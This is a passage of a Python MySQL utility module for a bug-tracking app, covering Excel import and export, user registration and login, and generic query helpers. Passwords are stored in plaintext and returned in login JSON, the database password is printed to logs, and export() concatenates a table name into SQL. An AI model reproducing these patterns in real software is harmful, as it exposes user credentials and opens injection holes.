'values (null, %s, %s, %s, %s, %s, %s, %s, %s, %s,%s, %s, %s, %s, %s, %s, %s, %s, %s, %s) ' \
'on duplicate key update bug_submit_date=%s,project=%s,software=%s,test_version=%s,bug_description=%s,severity_level=%s,priority=%s,bug_difficulty=%s,bug_status=%s,bug_close_date=%s,close_version=%s,cause_analysis=%s,bug_img=%s,intermediate_situation=%s,developer=%s,remark=%s,regression_times=%s,reopen_times=%s'
print('sql==', sql)
# 执行前先判断索引列(submitterindex)是否有重复的,提示用户,重复的行是submitterindex_col_list[n] +1
submitterindex_col_list = []
for r in range(1, sheet.nrows):
submitterindex = sheet.cell(r, 18).value
submitterindex_col_list.append(submitterindex)
for k, v in Counter(submitterindex_col_list).items():
if v > 1:
isrepeat = 1 # 有重复选项
msg = '上传的execel表索引有重复,请检查submitterindex列'
print('重复的元素', k)
repeatlist.append(k)
if isrepeat != 1: # 没有重复项
# 创建一个for循环迭代读取xls文件每行数据的, 从第二行开始是要跳过标题行
for r in range(1, sheet.nrows):
# print('Nlie nrows==', sheet.nrows)
# print('curent r ==', r)
n = 1
# print('shel.cell', sheet.cell(r, n))
# bug_submit_date_noformat = datetime.strptime(str(sheet.cell(r, 0).value), '%Y-%m-%d').time()
# time.strftime("%Y-%m-%d %H:%M:%S", sheet.cell(r, 0).value)
bug_submit_date = sheet.cell(r, 0).value
# print('!!!!!!!!!!!!!!!!!!!!bug_submit_date', sheet.cell(r, 0).value)
if bug_submit_date is None or bug_submit_date == '':
# bug_submit_date = "1888-01-01"
bug_submit_date = None
elif type(bug_submit_date) == float:
# 类型为时间戳
bug_submit_date = xlrd.xldate.xldate_as_datetime(sheet.cell(r, 0).value, 0).strftime("%Y-%#m-%#d") # 应该传一个时间数值
# print("转换时间戳完成后", bug_submit_date)
elif type(bug_submit_date) == str:
# 上传时为xxxx/xx/xx这种格式,转化成 xxxx-zz-zz
bug_submit_date = bug_submit_date.replace("/", "-")
# bug_submit_date = datetime.strftime(datetime.strptime(bug_submit_date, "%Y/%m/%d"), "%Y-%#m-%#d")
# print('!!!!!!!!!!!!!!!!!!!!bug_submit_date 转换后type', type(bug_submit_date))
# print('!!!!!!!!!!!!!!!!!!!!bug_submit_date 转换后', bug_submit_date)
# 因为excel里面是2020/01/10这种格式的,所以需要转化
project = sheet.cell(r, 1).value
software = sheet.cell(r, 2).value
test_version = sheet.cell(r, 3).value
bug_description = sheet.cell(r, 4).value
severity_level = sheet.cell(r, 5).value # 严重等级
if severity_level is None or severity_level == '':
severity_level = None
priority = sheet.cell(r, 6).value # 优先级
if priority is None or priority == '':
priority = None
bug_difficulty = sheet.cell(r, 7).value
if bug_difficulty is None or bug_difficulty == '':
bug_difficulty = None
bug_status = sheet.cell(r, 8).value # float
# 将用户导入的“关闭情况” --》转成数字
# 1 处理(handle),2 关闭(close),3 回归(regression),4 延迟(delay), 5 重开(reopen) 0 未知(可能用户上传时bug_status字段不对)//excel上传导入时,填写中文、英文均可
if bug_status == "处理" or bug_status == "handle":
bug_status = 1
elif bug_status == "关闭" or bug_status == "close":
bug_status = 2
elif bug_status == "回归" or bug_status == "regression":
bug_status = 3
elif bug_status == "延迟" or bug_status == "delay":
bug_status = 4
elif bug_status == "重开" or bug_status == "reopen":
bug_status = 5
else:
bug_status = 0 # 未知(可能用户上传时bug_status字段不对)
bug_close_date = sheet.cell(r, 9).value
# print('!!!!!!!!!!!!!!!!!!!!bug_close_dateexcel日期类型 前', bug_close_date)
if bug_close_date is None or bug_close_date == '':
bug_close_date = None
elif type(bug_close_date) == float:
bug_close_date = xlrd.xldate.xldate_as_datetime(sheet.cell(r, 9).value, 0).strftime("%Y-%#m-%#d")
# print("转换时间戳完成后bug_close_date", bug_submit_date)
elif type(bug_close_date) == str:
# 类型为xxxx/xx/xx这种格式,转化成 xxx x-zz-zz
bug_close_date = bug_close_date.replace("/", "-")
# bug_close_date = datetime.strftime(datetime.strptime(bug_close_date, "%Y/%m/%d"), "%Y-%#m-%#d")
# print('!!!!!!!!!!!!!!!!!!!!bug_close_dateexcel日期类型 后', type(bug_close_date))
# print('!!!!!!!!!!!!!!!!!!!!bug_close_dateexcel日期 后', bug_close_date)
close_version = sheet.cell(r, 10).value
cause_analysis = sheet.cell(r, 11).value
bug_img = sheet.cell(r, 12).value
intermediate_situation = sheet.cell(r, 12).value
developer = sheet.cell(r, 14).value
remark = sheet.cell(r, 15).value
regression_times = sheet.cell(r, 16).value
# print("regression_times==============================", regression_times)
if regression_times is None or regression_times == '':
regression_times = None
reopen_times = sheet.cell(r, 17).value
# print("reopen_times==============================", reopen_times)
if reopen_times is None or reopen_times == '':
reopen_times = None
submitterindex = sheet.cell(r, 18).value
# print('-------查到的索引==', submitterindex)
n += 1
# values = (name, sex, minzu, danwei_zhiwu, phone_number, home_number) 第一行插入所需的变量(25个,除去bugid);第二行数据相同更新参数(24个-出去bugid 喝bug_description)
values = (
bug_submit_date, project, software, test_version, bug_description, severity_level, priority, bug_difficulty,
bug_status, bug_close_date, close_version, cause_analysis, bug_img, intermediate_situation, developer,
remark, regression_times, reopen_times, submitterindex,
bug_submit_date, project, software, test_version, bug_description, severity_level, priority, bug_difficulty,
bug_status, bug_close_date, close_version, cause_analysis, bug_img, intermediate_situation, developer,
remark, regression_times, reopen_times)
# print("!!!!!!!!!!!!!!导入values", values)
# values = (bug_submit_date, project, software, test_version)
# print('import_mysql_by_excel()方法 valuse=', values)
# 执行sql语句
cur.execute(sql, values)
code = 200
msg = '导入数据成功'
conn.commit()
columns = str(sheet.ncols)
rows = str(sheet.nrows)
print("导入 " + columns + " 列 " + rows + " 行数据到MySQL数据库!")
cur.close()
conn.close()
# 返回json格式的数据
data['code'] = code
data['msg'] = msg
data['count'] = count
data['data'] = buglist
data['isrepeat'] = isrepeat
data['repeatlist'] = repeatlist
# 转化下查询结果为{},{},{}这种格式======================
json_str = json.dumps(data, ensure_ascii=False)
print('dbutil==jsonStr=====', json_str)
return json_str
# 加上是否重复
is_exceldata_ok_jsonobj['isrepeat'] = 0 # 1有,0没有
is_exceldata_ok_jsonobj['repeatlist'] = [] # 提交者索引 重复内容
is_exceldata_ok_jsonstr = json.dumps(is_exceldata_ok_jsonobj)
return is_exceldata_ok_jsonstr
# 获取用户数据
def getUserList():
# 打开数据库连接
print(f'数据库配置{db_host},{db_user}, {db_passwd}, {db_dbname}')
conn = pymysql.connect(db_host, db_user, db_passwd, db_dbname, )
# 使用 cursor() 方法创建一个游标对象 cursor
cursor = conn.cursor()
sql = 'select * from bugcount.user'
cursor.execute(sql)
print('共有', cursor.rowcount, '条数据')
users = []
data = {}
results = cursor.fetchall()
for r in results:
print(r[0], end=' ')
print(r[1], end=' ')
print(r[2], end=' ')
print("---")
person = {}
person['id'] = r[0]
person['name'] = r[1]
person['pass'] = r[2]
users.append(person)
cursor.close()
conn.close()
data['code'] = 200
data['msg'] = '成功'
# data['msg'] = 'suesss'
data['users'] = users
json_str = json.dumps(data)
print(json_str)
return json_str
# 1. sql 2. 参数后面的匹配变量
def register(*args):
# 初始化返回的数据 [arg1, arg2, arg3, arg4] arg1=状态码(num)arg2=msg(str) arg3= count(num) arg4=tuple
# json数据
data = {}
users = []
# 默认定义数据
code = 500 # 默认失败
msg = 'sql语句执行失败'
count = 0 # sql语句执行结果个数
# 打开数据库连接
conn = pymysql.connect(db_host, db_user, db_passwd, db_dbname)
# print("*args====", args)
# print('参数args类型=={args}', type(args))
# 使用 cursor() 方法创建一个游标对象 cursor
cursor = conn.cursor()
# 使用 execute() 方法执行 SQL 查询
try:
# 执行sql语句 角色默认是普通用户 -2
sql = 'insert into bugcount.user (userid, username, password, user_remark, user_email, user_level, create_time, session, roleId)values(null, %s, %s, null, null, null, null, null, 2)'
cursor.execute(sql, args)
# 提交到数据库执行
conn.commit()
# 执行语句,返回结果
sql_return_result_tuple = cursor.fetchall()
# 转换查询结果为[{},{},{}]这种格式的
print("执行语句返回结果:", sql_return_result_tuple) # 返回元组
print("执行语句返回结果个数:", len(sql_return_result_tuple)) # 返回元组
print("执行语句返回结果(类型)==", type(sql_return_result_tuple))
print("sql语句执行成功")
# 转化下查询结果为{},{},{}这种格式======================
print('????????result=', sql_return_result_tuple)
print('????????????????????type = ', type(sql_return_result_tuple))
for r in sql_return_result_tuple:
print('=============进入循环')
print('=============进入循环r0', r[0])
print('=============进入循环r1', r[1])
print('=============进入循环r2', r[2])
print('=============进入循环r3', r[3])
print('=============进入循环r4', r[4])
print('=============进入循环r5', r[5])
print('=============进入循环r6', str(r[6]))
print('=============进入循环r7', r[7])
person = dict()
person['userid'] = r[0]
person['username'] = r[1]
person['password'] = r[2]
person['user_remark'] = r[3]
person['user_email'] = r[4]
person['user_level'] = r[5]
person['create_time'] = str(r[6])
person['session'] = r[7]
# print('==============循环person==', person)
users.append(person)
print('????dbutil 转换完的【{}】格式数据users==', users)
# 拼接返回数据,返回列表
code = 200 # 成功
msg = 'sql语句执行成功'
count = len(sql_return_result_tuple) # sql语句结果个数
# except Exception:
except:
# 如果发生错误则回滚
# 输出异常信息
traceback.print_exc()
print('出现异常,sql语句执行失败')
# print('出现异常,sql语句执行失败', Exception)
conn.rollback()
finally:
# 不管是否异常,都关闭数据库连接
cursor.close()
conn.close()
# 返回json格式的数据
data['code'] = code
data['msg'] = msg
data['count'] = count
data['data'] = users
# 转化下查询结果为{},{},{}这种格式======================
json_str = json.dumps(data, ensure_ascii=False)
print('dbutil==jsonStr=====', json_str)
return json_str
# login 登录
def login(*args):
# 初始化返回的数据 [arg1, arg2, arg3, arg4] arg1=状态码(num)arg2=msg(str) arg3= count(num) arg4=tuple
# json数据
data = {}
users = []
# 默认定义数据
code = 500 # 默认失败
msg = 'sql语句执行失败'
count = 0 # sql语句执行结果个数
# 打开数据库连接
conn = pymysql.connect(db_host, db_user, db_passwd, db_dbname)
# 使用 cursor() 方法创建一个游标对象 cursor
cursor = conn.cursor()
# 使用 execute() 方法执行 SQL 查询
try:
sql = 'select userid,username,password,user_remark,user_email,user_level,create_time,session from bugcount.user where username = %s and password = %s'
# print(f'sql语句为==', sql)
# print("*args====", args)
# print('参数args类型=={args}', type(args))
# 执行sql语句
cursor.execute(sql, args)
# 提交到数据库执行
conn.commit()
# 执行语句,返回结果
sql_return_result_tuple = cursor.fetchall()
# 转换查询结果为[{},{},{}]这种格式的
# print("执行语句返回结果:", sql_return_result_tuple) # 返回元组
# print("执行语句返回结果个数:", len(sql_return_result_tuple)) # 返回元组
# print("执行语句返回结果(类型)==", type(sql_return_result_tuple))
print("sql语句执行成功")
# 转化下查询结果为{},{},{}这种格式======================
# print('????????result=', sql_return_result_tuple)
# print('????????????????????type = ', type(sql_return_result_tuple))
for r in sql_return_result_tuple:
# print('=============进入循环')
# print('=============进入循环r0', r[0])
# print('=============进入循环r1', r[1])
# print('=============进入循环r2', r[2])
# print('=============进入循环r3', r[3])
# print('=============进入循环r4', r[4])
# print('=============进入循环r5', r[5])
# print('=============进入循环r6', str(r[6]))
# print('=============进入循环r7', r[7])
person = dict()
person['userid'] = r[0]
person['username'] = r[1]
person['password'] = r[2]
person['user_remark'] = r[3]
person['user_email'] = r[4]
person['user_level'] = r[5]
person['create_time'] = str(r[6])
person['session'] = r[7]
# print('==============循环person==', person)
users.append(person)
print('????dbutil 转换完的【{}】格式数据users==', users)
# 拼接返回数据,返回列表
count = len(sql_return_result_tuple) # sql语句结果个数
# 判断是否 能登录
if count > 0:
code = 200 # 成功
msg = '有此用户,可正常登录'
# except Exception:
except:
# 如果发生错误则回滚
# 输出异常信息
traceback.print_exc()
print('出现异常,sql语句执行失败')
# print('出现异常,sql语句执行失败', Exception)
conn.rollback()
finally:
# 不管是否异常,都关闭数据库连接
cursor.close()
conn.close()
# 返回json格式的数据
data['code'] = code
data['msg'] = msg
data['count'] = count
data['data'] = users
# 转化下查询结果为{},{},{}这种格式======================
json_str = json.dumps(data, ensure_ascii=False)
print('dbutil==jsonStr=====', json_str)
return json_str
# 检查用户名是否 数据库是否被占用 True:code=200 False: code=500
def check_username_is_registered(username):
# 初始化返回的数据 [arg1, arg2, arg3, arg4] arg1=状态码(num)arg2=msg(str) arg3= count(num) arg4=tuple
# json数据
data = {}
users = []
# 默认定义数据
code = 500 # 默认失败
msg = 'sql语句执行失败'
count = 0 # sql语句执行结果个数
# 打开数据库连接
conn = pymysql.connect(db_host, db_user, db_passwd, db_dbname)
# 使用 cursor() 方法创建一个游标对象 cursor
cursor = conn.cursor()
# 使用 execute() 方法执行 SQL 查询
try:
# 执行sql语句
sql = 'select userid,username,password,user_remark,user_email,user_level,create_time,session from bugcount.user where username=%s'
# print(f'sql语句为==', sql)
# print("*args====", username)
# print('参数args类型=={args}', type(username))
cursor.execute(sql, username)
# 提交到数据库执行
conn.commit()
# 执行语句,返回结果
sql_return_result_tuple = cursor.fetchall()
# 转换查询结果为[{},{},{}]这种格式的
# print("执行语句返回结果:", sql_return_result_tuple) # 返回元组
# print("执行语句返回结果个数:", len(sql_return_result_tuple)) # 返回元组
# print("执行语句返回结果(类型)==", type(sql_return_result_tuple))
print("sql语句执行成功")
# 转化下查询结果为{},{},{}这种格式======================
print('????????result=', sql_return_result_tuple)
print('????????????????????type = ', type(sql_return_result_tuple))
for r in sql_return_result_tuple:
# print('=============进入循环')
person = {}
person['userid'] = r[0]
person['username'] = r[1]
person['password'] = r[2]
person['user_remark'] = r[3]
person['user_email'] = r[4]
person['user_level'] = r[5]
person['create_time'] = str(r[6])
person['session'] = r[7]
users.append(person)
print('????dbutil 转换完的【{}】格式数据users==', users)
# 拼接返回数据,返回列表
code = 200 # 成功
msg = 'sql语句执行成功'
# print('?????????????????????josn sql_return_result_tuple type = ', type(len(sql_return_result_tuple)))
count = len(sql_return_result_tuple) # sql语句结果个数
except:
# 如果发生错误则回滚
print('sql语句执行失败')
conn.rollback()
finally:
# 不管是否异常,都关闭数据库连接
cursor.close()
conn.close()
# 返回json格式的数据
data['code'] = code
data['msg'] = msg
data['count'] = count
data['json_data'] = users
# 转化下查询结果为{},{},{}这种格式======================
json_str = json.dumps(data, ensure_ascii=False)
print('dbutil==jsonStr=====', json_str)
return json_str
"""
功能:导出数据库表中所有数据到 excel数据
"""
def export(tablename, outputpath):
# json数据
data = {}
buglist = []
code = 500 # 默认失败
msg = '导出失败'
count = 0 # sql语句执行结果个数
conn = pymysql.connect(db_host, db_user, db_passwd, db_dbname, charset='utf8')
cursor = conn.cursor()
sql = 'select bug_submit_date, project, software, test_version, bug_description, severity_level, priority, bug_difficulty, bug_status, bug_close_date, close_version, cause_analysis, bug_img, intermediate_situation, developer, remark, regression_times, reopen_times, submitterindex from ' + tablename
print('<dbutils> 导出数据 sql ==', sql)
count = cursor.execute(sql)
print(count)
# 重置游标的位置
cursor.scroll(0, mode='absolute')
# 搜取所有结果
results = cursor.fetchall()
# 获取MYSQL里面的数据字段名称
fields = cursor.description
workbook = xlwt.Workbook(encoding='utf-8') # 创建Workbook,相当于创建Excel
# sheet = workbook.add_sheet('table_'+table_name, cell_overwrite_ok=True)
sheet = workbook.add_sheet('Sheet1', cell_overwrite_ok=True) # 写入sheet1
# 写上字段信息
for field in range(0, len(fields)):
sheet.write(0, field, fields[field][0])
# 获取并写入数据段信息
row = 1
col = 0
for row in range(1, len(results) + 1):
for col in range(0, len(fields)):
sheet.write(row, col, u'%s' % results[row - 1][col])
# 写文件,如果目录文件不存在,则创建
workbook.save(outputpath)
# 返回json格式的数据
data['code'] = code
data['msg'] = msg
data['count'] = count
data['data'] = buglist
data['isrepeat'] = isrepeat
data['repeatlist'] = repeatlist
# 转化下查询结果为{},{},{}这种格式======================
json_str = json.dumps(data, ensure_ascii=False)
print('dbutil==jsonStr=====', json_str)
return json_str
# 功能:执行一条sql语句
# 1. sql 2. 参数后面的匹配变量
def execute_onesql(sql, *args):
# 初始化数据
code = 500 # 默认失败
msg = 'sql语句执行失败'
count = 0 # sql语句执行结果个数
sql_return_result_tuple = () # 执行sql会返回tuple
# 打开数据库连接
conn = pymysql.connect(db_host, db_user, db_passwd, db_dbname)
# print('sql语句为==', sql)
# print("*args====", args)
# print('参数args类型=={args}', type(args))
# 使用 cursor() 方法创建一个游标对象 cursor
cursor = conn.cursor()
# 使用 execute() 方法执行 SQL 查询
try:
# 执行sql语句
cursor.execute(sql, args)
# 提交到数据库执行
conn.commit()
# 执行语句,返回结果
sql_return_result_tuple = cursor.fetchall()
# print("执行语句返回结果:", sql_return_result_tuple) # 返回元组
# print("执行语句返回结果个数:", len(sql_return_result_tuple)) # 返回元组
# print("执行语句返回结果(类型)==", type(sql_return_result_tuple)) # tuple
print("sql语句执行成功")
# 拼接返回数据,返回列表
code = 200 # 成功
msg = 'sql语句执行成功'
except:
# 如果发生错误则回滚
print('sql语句执行失败')
conn.rollback()
return 0 # 异常返回数字0
finally:
# 不管是否异常,都关闭数据库连接
cursor.close()
conn.close()
# print('返回数据如下:')
# print(sql_return_result_tuple)
return sql_return_result_tuple
# 功能:执行一条sql语句,并返回表头数据
# 1. sql 2. 参数后面的匹配变量
def execute_onesql_returnth(sql, *args):
# 初始化数据
code = 500 # 默认失败
msg = 'sql语句执行失败'
count = 0 # sql语句执行结果个数
sql_return_result_tuple = () # 执行sql会返回tuple
# 打开数据库连接
conn = pymysql.connect(db_host, db_user, db_passwd, db_dbname)
# print('sql语句为==', sql)
# print("*args====", args)
# print('参数args类型=={args}', type(args))
# 使用 cursor() 方法创建一个游标对象 cursor
cursor = conn.cursor()
# 使用 execute() 方法执行 SQL 查询
try:
# 执行sql语句
cursor.execute(sql, args)
# 提交到数据库执行
conn.commit()
# 执行语句,返回结果
sql_return_result_tuple = cursor.description
# print("执行语句返回结果:", sql_return_result_tuple) # 返回元组
# print("执行语句返回结果个数:", len(sql_return_result_tuple)) # 返回元组
# print("执行语句返回结果(类型)==", type(sql_return_result_tuple)) # tuple
print("sql语句执行成功")
# 拼接返回数据,返回列表
code = 200 # 成功
msg = 'sql语句执行成功'
except:
# 如果发生错误则回滚
print('sql语句执行失败')
conn.rollback()
return 0 # 异常返回数字0
finally:
# 不管是否异常,都关闭数据库连接
cursor.close()
conn.close()
# print('返回数据如下:')
# print(sql_return_result_tuple)
return sql_return_result_tuple
# 功能:执行一条sql语句,返回json数据
# 1. sql 2. 参数后面的匹配变量
def execute_onesql_returnjson(sql, *args):
# 初始化数据
code = 500 # 默认失败
msg = 'sql语句执行失败'
count = 0 # sql语句执行结果个数
data = {}
jsondatas = [] # data:{jsondatas}
# 打开数据库连接
conn = pymysql.connect(db_host, db_user, db_passwd, db_dbname)
# print('sql语句为==', sql)
# print("*args====", args)
# print('参数args类型=={args}', type(args))
# 使用 cursor() 方法创建一个游标对象 cursor
cursor = conn.cursor()
# 使用 execute() 方法执行 SQL 查询
try:
# 执行sql语句
cursor.execute(sql, args)
# 提交到数据库执行
conn.commit()
# 执行语句,返回结果
sql_return_result_tuple = cursor.fetchall()
# print("执行语句返回结果:", sql_return_result_tuple) # 返回元组
# print("执行语句返回结果个数:", len(sql_return_result_tuple)) # 返回元组
# print("执行语句返回结果(类型)==", type(sql_return_result_tuple)) # tuple
print("sql语句执行成功")
# 拼接返回数据,返回列表
code = 200 # 成功
msg = 'sql语句执行成功'
count = len(sql_return_result_tuple)
except:
# 如果发生错误则回滚
print('sql语句执行失败')
conn.rollback()
return 0 # 异常返回数字0
finally:
# 不管是否异常,都关闭数据库连接
cursor.close()
conn.close()
# 5.返回json格式的数据
data['code'] = code
data['msg'] = msg
data['count'] = count
data['data'] = jsondatas
# 转化下查询结果为{},{},{}这种格式======================
json_str = json.dumps(data, ensure_ascii=False)
print('<dbutil.py> (execute_onesql_returnjson) 返回jsonStr=====', json_str)
return json_str
# 功能:执行一条sql语句,返回json数据.里面sqlresultcode =
# 1. sql 2. 参数后面的匹配变量
def execute_onesql_returnjson_privilege(sql, *args):
# 初始化数据
code = 500 # 默认失败
msg = 'sql语句执行失败'
count = 0 # sql语句执行结果个数
data = {}
jsondatas = [] # data:{jsondatas}
privilege_int = 0
# 打开数据库连接
conn = pymysql.connect(db_host, db_user, db_passwd, db_dbname)
# print('sql语句为==', sql)
# print("*args====", args)
# print('参数args类型=={args}', type(args))
# 使用 cursor() 方法创建一个游标对象 cursor
cursor = conn.cursor()
# 使用 execute() 方法执行 SQL 查询
try:
# 执行sql语句
cursor.execute(sql, args)
# 提交到数据库执行
conn.commit()
# 执行语句,返回结果
sql_return_result_tuple = cursor.fetchall()
print("获取权限,执行语句返回结果:", sql_return_result_tuple) # 返回元组
print("获取权限执行语句返回结果个数:", len(sql_return_result_tuple)) # 返回元组
print("获取权限执行语句返回结果(类型)==", type(sql_return_result_tuple)) # tuple
print("获取权限sql语句执行成功")
# 拼接返回数据,返回列表
code = 200 # 成功
msg = 'sql语句执行成功'
count = len(sql_return_result_tuple)
privilege_int = sql_return_result_tuple[0]
except:
# 如果发生错误则回滚
print('sql语句执行失败')
conn.rollback()
return 0 # 异常返回数字0
finally:
# 不管是否异常,都关闭数据库连接
cursor.close()
conn.close()
# 5.返回json格式的数据
data['code'] = code
data['msg'] = msg
data['count'] = count
data['data'] = jsondatas
data['privilege_int'] = privilege_int
# 转化下查询结果为{},{},{}这种格式======================
json_str = json.dumps(data, ensure_ascii=False)
print('<dbutil.py> (execute_onesql_returnjson) 返回jsonStr=====', json_str)
return json_str
# 功能:执行一条sql语句,返回int数据
# 1. sql 2. 参数后面的匹配变量
def execute_onesql_returnint(sql, *args):
# 初始化数据
result_int = 0 # sql语句执行结果
# 打开数据库连接
conn = pymysql.connect(db_host, db_user, db_passwd, db_dbname)
# print('sql语句为==', sql)
# print("*args====", args)
# print('参数args类型=={args}', type(args))
# 使用 cursor() 方法创建一个游标对象 cursor
cursor = conn.cursor()
# 使用 execute() 方法执行 SQL 查询
try:
# 执行sql语句
cursor.execute(sql, args)
# 提交到数据库执行
conn.commit()
# 执行语句,返回结果
sql_return_result_tuple = cursor.fetchall()
# print("执行语句返回结果:", sql_return_result_tuple) # 返回元组
# print("执行语句返回结果个数:", len(sql_return_result_tuple)) # 返回元组
# print("执行语句返回结果(类型)==", type(sql_return_result_tuple)) # tuple
print("sql语句执行成功")
# 拼接返回数据,返回列表
result_int = sql_return_result_tuple[0] # 成功
# print('获取权限,typesql_return_result_tuple ========================', sql_return_result_tuple)
msg = 'sql语句执行成功'
except:
# 如果发生错误则回滚
print('sql语句执行失败')
conn.rollback()
return 0 # 异常返回数字0
finally:
# 不管是否异常,都关闭数据库连接
cursor.close()
conn.close()
# 5.返回json格式的数据
return result_int
# 功能:执行一条sql语句,返回tuple数据
# 1. sql 2. 参数后面的匹配变量
def execute_onesql_returntuple(sql, *args):
# 初始化数据
result_int = 0 # sql语句执行结果
# 打开数据库连接
conn = pymysql.connect(db_host, db_user, db_passwd, db_dbname)
# print('sql语句为==', sql)
# print("*args====", args)
# print('参数args类型=={args}', type(args))
# 使用 cursor() 方法创建一个游标对象 cursor
cursor = conn.cursor()
# 使用 execute() 方法执行 SQL 查询
try:
# 执行sql语句
cursor.execute(sql, args)
# 提交到数据库执行
conn.commit()
# 执行语句,返回结果
sql_return_result_tuple = cursor.fetchall()
# print("执行语句返回结果:", sql_return_result_tuple) # 返回元组
# print("执行语句返回结果个数:", len(sql_return_result_tuple)) # 返回元组
# print("执行语句返回结果(类型)==", type(sql_return_result_tuple)) # tuple
print("sql语句执行成功")
# 拼接返回数据,返回列表
msg = 'sql语句执行成功'
except:
# 如果发生错误则回滚
print('sql语句执行失败')
conn.rollback()
return 0 # 异常返回数字0
finally:
# 不管是否异常,都关闭数据库连接
cursor.close()
conn.close()
# 5.返回json格式的数据
return sql_return_result_tuple
# 写入excel文件
"""
功能:写入excel文件
参数:path : excel文件的输出路径,结尾必须带上文件后缀,基于项目根目录的路径。如 根目录是“D:” excelrelapath = "test1.xlsx" ->最前面不用加\\
注意:1. excel文件名不存在会自动创建
2. excel文件上级文件夹,如果不存在,不会自动创建
"""
def wirte2excelfile(excelrelpath):
"""
# xlwt方式创建workbook
# 创建sheet
# sheet中写入数据
# 保存excel
book = xlwt.Workbook(encoding='utf-8')
sheet1 = book.add_sheet(u'Sheet1', cell_overwrite_ok=True)
sheet1.write(0, 0, 'haha')
book.save('D:\\test1.xls') # 需要写2个\\ xlsx 不支持xlsx格式文件
"""
# XlsxWriter方式创建workbook
excelabspath = rootdir + "\\" + excelrelpath
print("excel文件绝对路径", excelabspath)
book = xlsxwriter.Workbook(excelabspath)
# book = xlsxwriter.Workbook("D:\\test1.xlsx") # 必须使用双\\ 否则报参数错误
# 创建sheet
sheet1 = book.add_worksheet("Sheet1")
# sheet中写入数据
sheet1.write(0, 0, "ssss")
sheet1.write(0, 1, "ssss")
sheet1.write(0, 2, "ssss")
# 关闭workbook
book.close()
# 写入excel文件
"""
功能:写入excel文件
参数:1. excelrelpath : excel文件的输出路径(相对根目录的路径,路径前不用加\\),结尾必须带上文件后缀,基于项目根目录的路径。如 根目录是“D:” excelrelapath = "test1.xlsx" ->最前面不用加\\
2. searchsql : 查询语句
2. ifwirte_th : 是否写入表头,默认是True,即写入表头
注意:1. excel文件名不存在会自动创建
2. excel文件上级文件夹,如果不存在,不会自动创建
"""
def write2excelfile_returnjson_onesheet(excelrelpath, searchsql, ifwrite_th=True):
# 1. 初始化json数据
code = 500 # 默认失败
count = 0 # sql语句执行结果个数
data = {}
buglist = []
msg = '写入excel数据失败'
# 2. 执行sql语句,获取返回值
# sql = 'select bug_submit_date, project, software, test_version, bug_description, severity_level, priority, bug_difficulty, bug_status, bug_close_date, close_version, cause_analysis, bug_img, intermediate_situation, developer, remark, regression_times, reopen_times, submitterindex from bugcount.buglist'
thtuples = execute_onesql_returnth(searchsql)
print("====================thtuple=", thtuples)
tdtuples = execute_onesql(searchsql)
print("excel内容=========", tdtuples)
# 3. 写入excel
# XlsxWriter方式创建workbook
excelabspath = rootdir + "\\" + excelrelpath
print("excel绝对路径=", excelabspath)
book = xlsxwriter.Workbook(excelabspath)
sheet1 = book.add_worksheet("Sheet1") # 写入哪个Sheet
# 如果ifwrite_th = True,写入表头,写上字段信息,写入时将英文转成中文表头
if ifwrite_th is True:
for th in range(0, len(thtuples)): # th是数字
# print("表头", thtuples[th][0])
# sheet1.write(0, th, thtuples[th][0])
sheet1.write(0, th, tableheaddict[thtuples[th][0]])
# 写入数据
# 获取并写入数据段信息
row = 1
col = 0
for row in range(1, len(tdtuples) + 1):
for col in range(0, len(thtuples)):
if tdtuples[row - 1][col] is None or tdtuples[row - 1][col] == '': # 表格内容是None,替换成空字符串
sheet1.write(row, col, '')
else:
# 转换日期格式 ‘提交日期’列数从0开始
if col == 0:
# 不为空的话,转成YYYY-MM-DD这种格式的,
# sheet1.write(row, col, datetime.strptime(tdtuples[row - 1][col], '%Y-%m-%d').date().strftime("%Y/%m/%d")) # 导出前已经是日期格式,这样写法错误
# print("?????????????", tdtuples[row - 1][col].strftime("%Y/%#m/%#d"))
# sheet1.write(row, col, tdtuples[row - 1][col].strftime("%Y/%#m/%#d"))
sheet1.write(row, col, datetime.strftime(tdtuples[row - 1][col], "%Y/%#m/%#d")) # 转成日期格式str
# 将 ‘关闭情况’int--> 文字
elif col == 8: # 第9列是 ‘关闭情况’
# print('tdtuples[row - 1][col]type======================', type(tdtuples[row - 1][col])) # int
# print('tdtuples[row - 1][col]======================', tdtuples[row - 1][col])
if tdtuples[row - 1][col] == 1:
# tdtuples[row - 1][col] = '处理' # 因为tuple 不能复制,所以这种写法错误,报错TypeError: 'tuple' object does not support item assignment
sheet1.write(row, col, '处理')
elif tdtuples[row - 1][col] == 2:
sheet1.write(row, col, '关闭')
elif tdtuples[row - 1][col] == 3:
sheet1.write(row, col, '回归')
elif tdtuples[row - 1][col] == 4:
sheet1.write(row, col, '延迟')
elif tdtuples[row - 1][col] == 5:
sheet1.write(row, col, '重开')
else:
sheet1.write(row, col, '未知')
elif col == 9: # 关闭时间
# 不为空
# print("?????????????当前值", tdtuples[row - 1][col])
# print("?????????????当前值type", type(tdtuples[row - 1][col]))
# print("?????????????", tdtuples[row - 1][col].strftime("%Y/%#m/%#d"))
sheet1.write(row, col, tdtuples[row - 1][col].strftime("%Y/%#m/%#d"))
else:
sheet1.write(row, col, u'%s' % tdtuples[row - 1][col]) # 写入具体内容
book.close() # 必须关闭流,否则写不进去
# 4. 重置json数据,顺序执行完就算陈公公
code = 200
msg = '写入excel数据成功'
count = len(thtuples)
# 5.返回json格式的数据
data['code'] = code
data['msg'] = msg
data['count'] = count
data['data'] = buglist
# 转化下查询结果为{},{},{}这种格式======================
json_str = json.dumps(data, ensure_ascii=False)
print('dbutil==jsonStr=====', json_str)
return json_str
"""
功能:写入excel文件
参数:1. excelrelpath : excel文件的输出路径(相对根目录的路径,路径前不用加\\),结尾必须带上文件后缀,基于项目根目录的路径。如 根目录是“D:” excelrelapath = "test1.xlsx" ->最前面不用加\\
2. searchsql : 查询语句
2. ifwirte_th : 是否写入表头,默认是True,即写入表头
注意:1. excel文件名不存在会自动创建
2. excel文件上级文件夹,如果不存在,不会自动创建
"""
def write2excelfile_returnjson_nsheet(excelrelpath, searchsql, ifwrite_th=True):
# 1. 初始化json数据
code = 500 # 默认失败
count = 0 # sql语句执行结果个数
data = {}
buglist = []
msg = '写入excel数据失败'
# 打开数据库连接
conn = pymysql.connect(db_host, db_user, db_passwd, db_dbname)
# 使用 cursor() 方法创建一个游标对象 cursor
cursor = conn.cursor()
get_project_sql = "select project from bugcount.buglist where project is not null and project != '' group by project"
projects = execute_onesql_returntuple(get_project_sql)
print("???????项目==", projects)
# 2. 执行sql语句,获取返回值
sql = 'select bug_submit_date, project, software, test_version, bug_description, severity_level, priority, ' \
